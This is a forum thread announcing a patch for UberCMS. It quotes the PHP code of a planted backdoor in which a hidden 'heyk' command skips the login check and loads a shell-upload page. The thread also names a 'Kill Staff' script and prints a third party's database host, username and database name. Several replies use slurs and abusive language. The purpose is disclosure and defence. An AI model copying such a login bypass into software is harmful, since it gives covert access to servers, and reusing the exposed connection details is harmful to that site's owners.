[UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

Page 1 of 2 12 LastLast
Results 1 to 15 of 27
  1. #1
    I'm-a ruin you, cunt! Delici0us is offline
    MemberRank
    Apr 2008 Join Date
    IsraelLocation
    731Posts

    [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Warning

    If you choose not to update, then that is your fault. At the bottom of this page I have included the exploit and how you execute it (and where it is located). If you have been raped from this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release.


    Uber 2.x.x - Top Level Patch
    Another nail in Jonty’s coffin.

    Yesterday as you may have seen Jonty came back to release an update for UberCMS. I later found out it was just an update for the ASE (All Seeing Eye) folder that had contained an important and crucial bug fix. The fix was in there, I even witnessed the fix in place.

    After looking thought the source earlier, after hearing about someone’s misfortune because of it I found something quite intriguing – He had patched the exploit, but had included and revamped his previous one. This time he had coded a shell upload utility, which could be reached from within the ASE.

    Take a look at this [Code from the Index.php]
    Code:
    if (!HK_LOGGED_IN && $_cmd != 'login' && $_cmd != 'heyk')
    {
        header("Location: " . HK_WWW . "/index.php?_cmd=login");
        exit;
    }
    If you’re not into PHP or just don’t have a clue what that means in English, here it is. If the housekeeping session is not registered, and the command is not login or heyk redirect to the login page.

    Well, what is ‘HeyK’ you may ask – It is the way he was activating the shell. When you look further down you can see how.

    Code:
        case 'heyk';
            require_once 'pages/yessir.php';
        break;
    The yessir.php page contained the upload script and that’s how some people got hacked.

    The ASE also contained another little trick, where he could also pass information to TPL files and as such write his own code. I know some sites have had their entire staff list deleted because of this.

    It also contained some other little tricks that he had embedded into other pages. I looked over most of the code, and because some of the things exist all the way back to when it was first released by him I have decided not to inform you of them.

    Yesterday I released his ASE as a patch, because at first that’s what I believed it to be. I would like to take this time to apologise to anyone that was poorly affected by this and in future I will ensure I read and clean all of his code before I try and help. This was in-appropriate for him to do. And I sincerely hope nobody else gets attacked by him.

    On one last note, if you download my previous ASE download and his release – You will see they are identical.

    P.S - If you want to hate on me, or say I’m in the wrong… Please do! At least I came back to fix this shitty mess he made. Oh, and if you think I made all of this up? Why does he have the MySQL details for THC-Hotel?

    Code:
        $config['MySQL']['hostname'] = "216.245.213.26";
        $config['MySQL']['username'] = "thc_web";
        $config['MySQL']['password'] = "*******";
        $config['MySQL']['database'] = "thchotel";
    Last edited by Delici0us; 01-08-12 at 07:20 PM. Reason: Update of Patch


  2. #2
    The one and only! Hejula is offline
    MemberRank
    Nov 2008 Join Date
    4,128Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Wow, haha. Thanks for this, appreciated.

  3. #3
    Zephyr Studios PRIZM is offline
    MemberRank
    Feb 2012 Join Date
    DenmarkLocation
    2,291Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Oh i like, thanks Delici0us

  4. #4
    I'm-a ruin you, cunt! Delici0us is offline
    MemberRank
    Apr 2008 Join Date
    IsraelLocation
    731Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Quote Originally Posted by Hejula View Post
    Wow, haha. Thanks for this, appreciated.
    Glad I could be of assistance. Hopefully people become more wary of the code he feeds them and they learn to update.

    Quote Originally Posted by Lasse View Post
    Oh i like, thanks Delici0us
    My pleasure

    Hopefully this is the last time I have to patch his work.

  5. #5
    ส็็็็็็็ Bloodraven is offline
    MemberRank
    Sep 2009 Join Date
    AntarcticaLocation
    2,414Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Jonty really is a complete twat then...

  6. #6
    I'm-a ruin you, cunt! Delici0us is offline
    MemberRank
    Apr 2008 Join Date
    IsraelLocation
    731Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Quote Originally Posted by zJordan View Post
    Jonty really is a complete twat then...
    Did you expect anything else from him? He has an ego the size of a small planet, in his eyes the only hotel that deserves existence is ZAP (give him some credit, it’s a nice hotel). Lots of hotels have built up from his code so he must have saw a loophole for rape.

  7. #7
    Member Frippe is offline
    MemberRank
    Jun 2012 Join Date
    66Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Thanks for this! :) (maybe my ubercms has been hacked sometimes by this?).

    EDIT: What do you mean with: "If you have been raped from this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release."?
    Last edited by Frippe; 15-07-12 at 11:18 PM.

  8. #8
    I'm-a ruin you, cunt! Delici0us is offline
    MemberRank
    Apr 2008 Join Date
    IsraelLocation
    731Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Quote Originally Posted by Frippe View Post
    Thanks for this! :) (maybe my ubercms has been hacked sometimes by this?).

    EDIT: What do you mean with: "If you have been raped from this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release."?
    If your hotel has staff, but the staff list keeps getting reset then the kill code has been inserted into the me.tpl (or me.php) that resets all ranks back to 1 every time it’s loaded.

  9. #9
    Member Frippe is offline
    MemberRank
    Jun 2012 Join Date
    66Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Quote Originally Posted by Delici0us View Post
    If your hotel has staff, but the staff list keeps getting reset then the kill code has been inserted into the me.tpl (or me.php) that resets all ranks back to 1 every time it’s loaded.
    Yes it has on my cms!! What do I do?! I've downloaded the patch so it is fine now? This is annoying!

  10. #10
    hoi Nilenz is offline
    MemberRank
    May 2011 Join Date
    The NetherlandsLocation
    380Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Thanks for the Fix for Exploits and Backdoors
    I will be used this

  11. #11
    I'm-a ruin you, cunt! Delici0us is offline
    MemberRank
    Apr 2008 Join Date
    IsraelLocation
    731Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Quote Originally Posted by Frippe View Post
    Lasse, ignore please?
    Send me the link to your hotel in PM and I'll tell you if you have been infected. If you have I'll clean it for you.

  12. #12
    Member Frippe is offline
    MemberRank
    Jun 2012 Join Date
    66Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Quote Originally Posted by Delici0us View Post
    Send me the link to your hotel in PM and I'll tell you if you have been infected. If you have I'll clean it for you.
    I think it's fixed now but I will send you a PM if I still have the problem.

  13. #13
    Alpha Member Zak© is offline
    MemberRank
    Oct 2007 Join Date
    2,693Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Lol serves you all right for trusting that twat again.

  14. #14
    IT-Developer djboetz is offline
    MemberRank
    Aug 2010 Join Date
    SwedenLocation
    210Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    As i said several times ago, a lot people did not believe me.
    "Jonty put an exploit in every work he release FREE on Public", he have hacked my hotel as well some months ago.

  15. #15
    Gamma Spamma Liam is offline
    MemberRank
    Dec 2011 Join Date
    Down UnderLocation
    2,946Posts

    Re: [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Now, this is exactly why you don't always rely on fuck heads like Jonty for your hotel, it's always best of making your own edit, or learning PHP.. And hasn't anyone learnt from Jonty's past, how much of a faggot he is? No one ever listens to other members, and trust me, Jonty is just greedy..



Page 1 of 2 12 LastLast

Advertisement